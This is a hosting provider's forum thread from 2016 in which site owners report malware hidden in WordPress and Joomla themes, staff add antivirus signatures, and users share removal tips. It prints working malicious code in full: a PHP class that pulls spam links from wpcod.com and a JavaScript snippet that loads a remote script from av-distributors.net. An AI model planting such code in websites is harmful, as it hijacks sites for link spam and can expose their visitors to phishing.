• UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепропетровск
  • +38(062) 210-24-93  Донецк
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 449-04-21  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 007-72-35  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Пожелания и предложения. Добавить в антивирус вредоносный код.

Форумы Пожелания и предложения Добавить в антивирус вредоносный код.
tod_m
29.09.2016 14:34
хостинг: есть
домен: есть
5
Добавить в антивирус вредоносный код.
Добрый день.

В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.
Cудя по статьям в сети это часто встречающийся вредоносны код!
Предлагаю добавить его в ваш антивирус и помочь многим пользователям избавится от проблем.
Домен злоумышленников wpcod.com, их провайдеру уже выслана жалоба.
Ссылки с подтверждением вредоносности и код приведены ниже.

Код находится в function.php
class Get_links {

    var $host = 'wpcod.com';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}


и в footer.php
< ?php if ($user_ID) : ?>< ?php else : ?>
< ?php if (is_single() || is_page() ) { ?>
< ?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php');
$links = new Get_links(); $links = $links->get_remote(); echo $links; ?>
< ?php } ?>
< ?php endif; ?>


Ссылки с жалобами на других сайтах:
Инструкция Левые ссылки в шаблонах. Осторожно с бесплатными шаблонами. - Бормотухи.НЕТ
Блог обычного человека: мысли, записи, мнения — Tarasevich.Info
Список рефспама | Valerevna.ru
Скрытые ссылки в шаблонах WP, Joomla, DLE | BestSkins.ru
s0639541902
29.09.2016 14:42
хостинг: есть
домен: есть
1
Да проблема существует и довольно распространена, за последний месяц у клиентов встречал такое двжады, причём во всех случаях вордпресс, и код 1 в 1 как у вас

во вложении скриншот кода + скриншот с сайта самих мудаков
Прикрепленные файлы:
alina03
29.09.2016 15:06
хостинг: нет
домен: нет
1
+1
У нас теж таке зустрічалося.
Прохання добавити його в антивірус, якщо є така можливість.
oleksandr.franko
29.09.2016 19:28
хостинг: есть
домен: есть
Это часто встречается в бесплатных шаблонах, не раз такое встречал.
Используют сайты жертв для черного сео либо для фишинга.
С таким нужно бороться!

В последней ссылке приведены еще 4 примера вредоносного кода. Их, я думаю, тоже стоить добавить в антивирус.
Скрытые ссылки в шаблонах WP, Joomla, DLE | BestSkins.ru
eugen
29.09.2016 19:59
хостинг: есть
домен: есть
2
Добавили тестовые сигнатуры, если что-то по ним найдется - завтра добавим в рабочий антивирус
tod_m
29.09.2016 20:06
хостинг: есть
домен: есть
Спасибо!

Сообщите, пожалуйста, о результатах.
eugen
29.09.2016 20:08
хостинг: есть
домен: есть
Да, напишу в этой теме. Завтра во второй половине дня будем знать
eugen
30.09.2016 15:24
хостинг: есть
домен: есть
3
По результатам оставили три новых сигнатуры. В 4% хостинг аккаунтов обнаружились темы с такими включениями. Больше всего с подгрузкой ссылок с wpconfig .net
tod_m
30.09.2016 15:35
хостинг: есть
домен: есть
Спасибо за информацию.

Будете добавлять в антивирус?
eugen
30.09.2016 15:39
хостинг: есть
домен: есть
Да, сейчас при сканировании аккаунта уже будут находиться темы с такими включениями
Илья
30.09.2016 15:40
хостинг: есть
домен: есть
1
В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.
Cудя по статьям в сети это часто встречающийся вредоносны код!
© tod_m

Спасибо автору статьи за подробно описанную проблему с вирусом. Благодаря чему была добавлена новая сигнатура в антивирус.
tod_m
30.09.2016 15:45
хостинг: есть
домен: есть
Вам спасибо за понимание и оперативность!
ppomobil
01.10.2016 08:53
хостинг: есть
домен: есть
Спасибо за информацию, в footer в свое время удалил эту гадость, потому как лезла ссылка, а вот в functions не додумался залезть, сегодня пришло письмо с предупреждением.
tod_m
01.10.2016 22:59
хостинг: есть
домен: есть
Сайты с которых эти ссылки загружаются и с которых продаются находятся на freehost.
29-ого написали им жалобу. Они ответили, что запросили информацию у клиента.

Кстати, у меня в акаунте нашло 4 зараженных сайта!
Но больше всего удивило то, что вредоносный код нашло на сайте который устанавливали в 2012 году!
Выходит они уже больше четырех лет распространяют зараженные темы на ВП.
oales00
02.10.2016 16:23
хостинг: есть
домен: есть
як його видалити??
s0639541902
02.10.2016 16:45
хостинг: есть
домен: есть
1
Если вы более или менее разбираетесь в вебе, то можете скачать проект и через допустим total commander или же
PhpStorm попробовать найти фрагменты кода приведённого в первом посте, (Если же вам об этом сообщил антивирус хостинга Украина, то там наверно есть указание на файл с вредоносным кодом.) Далее просто заходите в файл и удаляете фрагмент, а так же место где он объявляется, всё это описано в первом сообщении.
Если же у вас не желания самостоятельно удалить вредоносный код, можете обратиться к специалистам, думаю найти людей подходящего уровня не составит труда.

пс. Если хотите мы вам предоставим своего специалиста ( support@ubs.com.ua ) туда пишите сколько сайтов нужно почистить там уже договоримся.
fuzz1k
02.10.2016 19:59
хостинг: нет
домен: нет
а у меня нет такого кода.как так?
tod_m
02.10.2016 20:13
хостинг: есть
домен: есть
а у меня нет такого кода.как так? © fuzz1k

А почему Вы решили, что он у Вас должен быть?
fuzz1k
09.10.2016 10:50
хостинг: нет
домен: нет

а у меня нет такого кода.как так? © fuzz1k
А почему Вы решили, что он у Вас должен быть?
© tod_m


есть он в function.php , я думал на моем сайте смотреть нужно. подскажите как его удалить? выделить и shift del ? так он не удаляется почему то
Евгений В.
09.10.2016 13:47
хостинг: есть
домен: нет
подскажите как его удалить? выделить и shift del ? так он не удаляется почему то © fuzz1k

Это делается через "Хостинг" -- "Файл-менеджер", открыть папку с файлом, правой кнопкой мыши по файлу, пункт "Редактировать". Дальше - как в обычном текстовом редакторе все.
eley11
15.10.2016 08:23
хостинг: есть
домен: нет
-2
Простите, я не понял, а как удалять этот код? Написано много, а толку от статьи нет. И админы ещё предлагают данную тему для знакомства. Должны в верху темы, красным цветом, крупным шрифтом описать метод удаления.
Илья
15.10.2016 11:59
хостинг: есть
домен: есть
Простите, я не понял, а как удалять этот код? © eley11

Попробуйте удалить все куски и класс Get_links и те строки, которые приведены в начале темы в footer.
Предварительно сделайте резервную копию файлов.
joli.ru
16.10.2016 19:36
хостинг: есть
домен: есть
Подскажите пожалуйста нашла и удалила код из первого сообщения и появилась ошибка Parse error: syntax error, unexpected '}' in /home/meblisos/mebli-sos.zp.ua/www/wp-content/themes/craftsman_wp_theme/functions.php on line 580
я так понимаю лишний знак '}'? или наоборот не хватает? убирала и вставляла их и так и сяк все равно...
tod_m
16.10.2016 19:38
хостинг: есть
домен: есть
я так понимаю лишний знак '}'? или наоборот не хватает? убирала и вставляла их и так и сяк все равно... © joli.ru

Приложите файл во вложении.
Посмотрим.
joli.ru
16.10.2016 19:43
хостинг: есть
домен: есть
вот исходный не исправленный
Прикрепленные файлы:
tod_m
16.10.2016 19:46
хостинг: есть
домен: есть
Исправил.
Во вложении.
Прикрепленные файлы:
joli.ru
16.10.2016 19:54
хостинг: есть
домен: есть
1
спасибо огромное, заменила - всё работает!))
prokopchuk.m
19.10.2016 16:37
хостинг: есть
домен: есть
2
Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://av-distributors.net/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Находится он в файле index.php шаблона.
dotern
20.10.2016 11:24
хостинг: есть
домен: есть
Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla: © prokopchuk.m


Вы, наверное, скачиваете шаблоны зараженные
tod_m
20.10.2016 11:36
хостинг: есть
домен: есть
Вы, наверное, скачиваете шаблоны зараженные
© misha_into


Насколько я заметил по вордпресу, все бесплатные шаблоны которые не из официального репозитория - заражены.
Для этого мы и подняли эту тему, что б выявить и добавить в антивирус все известные сигнатуры вирусов.
Большенство пользователей даже не догадывается что в шаблоне может быть вирус.
dotern
20.10.2016 11:39
хостинг: есть
домен: есть
Там как правило не вирус, а вставленная ссылка другого сайта с целью поднятия тиц и pr
tod_m
20.10.2016 11:43
хостинг: есть
домен: есть
Там не просто ссылка, а функционал подгрузки ссылок с сервиса по черному СЕО.
Они их у себя на сайте продают и без ведома пользователя размещают на сайте.
dotern
20.10.2016 11:45
хостинг: есть
домен: есть
Не приятная штука. Может есть какие-то характерные признаки такого кода. Можно описать здесь инструкцию как выявлять такой код в шаблоне.
tod_m
20.10.2016 11:58
хостинг: есть
домен: есть
Может есть какие-то характерные признаки такого кода. © misha_into


Если есть примеры вредоносного кода то пишите их здесь, тех. поддержка хостинга рассмотрит их и если они актуальны - добавит в антивирус.
prokopchuk.m
22.10.2016 09:05
хостинг: есть
домен: есть
Вы, наверное, скачиваете шаблоны зараженные © misha_into

Некоторым сайтам более 2-х лет и до этого времени проблем не было, шаблоны абсолютно разные от стандартных (чистые типа протостар, но модифицировано мной) до студийных платных шаблонов.
s0639541902
24.10.2016 16:26
хостинг: есть
домен: есть
1
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://av-distributors.net/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>


Вопрос такой, prokopchuk.m показал до этого сигнатуру приведённую выше, вопрос к администрации хостинга, будут ли проверять хостинг на её наличие, или нужно создать отдельную тему?
Дмитрий Б.
28.10.2016 16:53
хостинг: есть
домен: нет
Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla: © prokopchuk.m

Как я понимаю удаление этого кода ситуацию не исправляет. Т.е. надо искать чем и как он добавляется и в вирусную базу заносить уже причину, а не следствие. Мало кому понравится получать каждый день от антивируса одни и те же сообщения.
s0639541902
28.10.2016 18:17
хостинг: есть
домен: есть
Как я понимаю удаление этого кода ситуацию не исправляет. Т.е. надо искать чем и как он добавляется и в вирусную базу заносить уже причину, а не следствие. Мало кому понравится получать каждый день от антивируса одни и те же сообщения. © Дмитрий Б.


Причиной является распространение бесплатных шаблонов, заражённых вирусами, делается это специально, цели тоже вполне понятны : Организация чёрных бирж ссылок, фишинг, кража данных,мошенничество с банковскими картами, шантаж и многое другое.
prokopchuk.m
28.10.2016 22:45
хостинг: есть
домен: есть
Причиной является распространение бесплатных шаблонов © s0639541902

Повторюсь, это относится и до студийных платных шаблонов.
s0639541902
28.10.2016 23:06
хостинг: есть
домен: есть
Это довольно странно читать, учитывая что многие студии делают свои шаблоны на основе бесплатных, и платные шаблоны не исключение, причём никто не гарантирует вам добросовестность их работы.
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Тема закрыта по истечению срока давности.
Горячая линия
(044)
392 74 33
другие города